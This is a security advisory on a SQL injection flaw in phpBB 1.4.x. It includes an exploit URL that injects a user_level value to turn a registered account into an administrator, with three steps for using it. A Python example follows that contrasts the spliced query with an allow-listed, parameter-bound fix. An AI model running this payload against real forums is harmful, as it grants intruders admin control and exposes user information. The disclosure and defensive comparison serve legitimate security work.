source: https://www.securityfocus.com/bid/3142/info
phpBB is free, open-source, easy-to-use web forums software.
An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service.
This problem is due to improper validation of user-supplied input passed through certain variables in phpBB. The issue can be exploited by making a specially crafted web request that contains arbitrary user-supplied replacement values.
One consequence of successful exploitation is that the attacker will be privy to user information.
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
Summary:
1. Register an account on a phpBB board version 1.4.x.
2. Enter the above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.
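As an added example that is not part of the advisory or of phpBB's own code: the string-splicing pattern the advisory describes, placed next to a hardened version (allow-list the preference value, then bind it as a parameter), run against a constructed in-memory SQLite table standing in for the forum's user table. The table layout, column names and the `alice` account are assumptions; the query string is the one from the URL above.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample request: the query string from the advisory's URL (host and path omitted).
SAMPLE_QUERY = "save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23"


def decoded_viewemail(query_string):
    """Return the viewemail value as the server sees it after URL decoding."""
    return parse_qs(query_string, keep_blank_values=True).get("viewemail", [""])[0]


def unsafe_update_sql(username, viewemail):
    """The pattern the advisory describes: the request value is spliced into the UPDATE text.
    Returns the statement text only, so the change in its meaning can be compared."""
    return f"UPDATE users SET viewemail='{viewemail}' WHERE username='{username}'"


def validate_flag(value):
    """viewemail is a yes/no preference; anything other than the literal '0' or '1' is rejected."""
    if value not in ("0", "1"):
        raise ValueError(f"rejected viewemail value: {value!r}")
    return int(value)


def make_db():
    """Constructed in-memory table standing in for the forum's user table (assumed layout)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, viewemail INTEGER, user_level INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [("alice", 0, 0), ("admin", 1, 4)])
    return con


def safe_update(con, username, viewemail):
    """Hardened form: allow-list the value, then bind it so it can only ever be data."""
    flag = validate_flag(viewemail)
    con.execute("UPDATE users SET viewemail=? WHERE username=?", (flag, username))
    return con.execute(
        "SELECT viewemail, user_level FROM users WHERE username=?", (username,)
    ).fetchone()


if __name__ == "__main__":
    value = decoded_viewemail(SAMPLE_QUERY)
    print("spliced statement:", unsafe_update_sql("alice", value))
    con = make_db()
    print("alice after legitimate save:", safe_update(con, "alice", "1"))
    try:
        safe_update(con, "alice", value)
    except ValueError as e:
        print("crafted value rejected:", e)
```

The spliced statement now assigns two columns and carries its own WHERE clause, which is exactly the shape change a query log or WAF rule can look for; the hardened path never lets the value reach the SQL text.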